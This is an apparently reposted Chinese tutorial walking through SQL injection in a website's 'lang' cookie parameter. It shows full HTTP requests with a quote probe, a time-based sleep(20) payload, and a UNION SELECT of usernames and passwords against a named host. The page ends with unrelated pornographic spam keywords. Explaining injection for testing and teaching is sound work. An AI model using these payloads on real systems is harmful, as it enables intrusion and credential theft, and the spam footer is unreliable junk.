LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

通過cookie中的參數(shù)所引發(fā)的sql注入

admin
2024年7月20日 21:33 本文熱度 1098

通過cookie中的參數(shù)所引發(fā)的sql注入

前言

在請求的cookie參數(shù)中,有一個名為lang的參數(shù)存在SQL注入漏洞。

在這個參數(shù)中注入一個單引號(')時,會引發(fā)SQL語法錯誤;而注入第二個單引號后,錯誤會消失。這表明參數(shù)中的輸入沒有正確地進行轉(zhuǎn)義或過濾,從而使得惡意的SQL代碼得以執(zhí)行。

正文

正常情況下和受到攻擊時的請求示例:

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

受到sql注入攻擊時候的請求

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en'; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

報錯如下:

當然也可以使用 查詢語句:

'%2b(select*from(select(sleep(20)))a)%2b'

將構(gòu)造好的查詢注入到原始的HTTP請求中,發(fā)送給目標服務(wù)器。注入點是請求的cookie參數(shù)lang:


GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en%2b(select*from(select(sleep(20)))a)%2b; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1
Upgrade-Insecure-Requests: 1

發(fā)送請求后,觀察服務(wù)器的響應(yīng)時間。如果服務(wù)器在處理請求時出現(xiàn)明顯的延遲(如20秒),則表明注入的查詢被服務(wù)器執(zhí)行了。這個時間延遲是由SQL中的SLEEP(20)函數(shù)引起的。

確認sql注入存在以后 ,進行漏洞利用

攻擊者可以構(gòu)造各種惡意SQL查詢來竊取或修改數(shù)據(jù)。例如,通過以下查詢來竊取用戶信息:

' UNION SELECT username, password FROM users --

發(fā)送惡意請求 攻擊者將惡意查詢注入到lang參數(shù)中,并發(fā)送請求:

GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1
Host: mtn.com.ye
Cookie: PHPSESSID=86ce3d04baa357ffcacf5d013679b696; lang=en' UNION SELECT username, password FROM users -- ; _ga=GA1.3.1859249834.1576704214; _gid=GA1.3.1031541111.1576704214; _gat=1; _gat_UA-44336198-10=1

攻擊者檢查服務(wù)器的響應(yīng),查看是否包含用戶數(shù)據(jù)。如果成功,攻擊者就能夠獲取數(shù)據(jù)庫中的敏感信息。



該文章在 2024/7/23 21:39:14 編輯過
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點晴ERP是一款針對中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國內(nèi)大量中小企業(yè)的青睞。
點晴PMS碼頭管理系統(tǒng)主要針對港口碼頭集裝箱與散貨日常運作、調(diào)度、堆場、車隊、財務(wù)費用、相關(guān)報表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點,圍繞調(diào)度、堆場作業(yè)而開發(fā)的。集技術(shù)的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點晴WMS倉儲管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質(zhì)期管理,貨位管理,庫位管理,生產(chǎn)管理,WMS管理系統(tǒng),標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務(wù)都免費,不限功能、不限時間、不限用戶的免費OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

黄频国产免费高清视频,久久不卡精品中文字幕一区,激情五月天AV电影在线观看,欧美国产韩国日本一区二区
亚洲日韩欧美一区二区三区在线 | 久久人人爽人人澡人人高潮AV | 在线se国产精品 | 在线中文字幕永久在线 | 亚洲精品色婷婷在线影院麻豆 | 久久se精品一区二区三区 |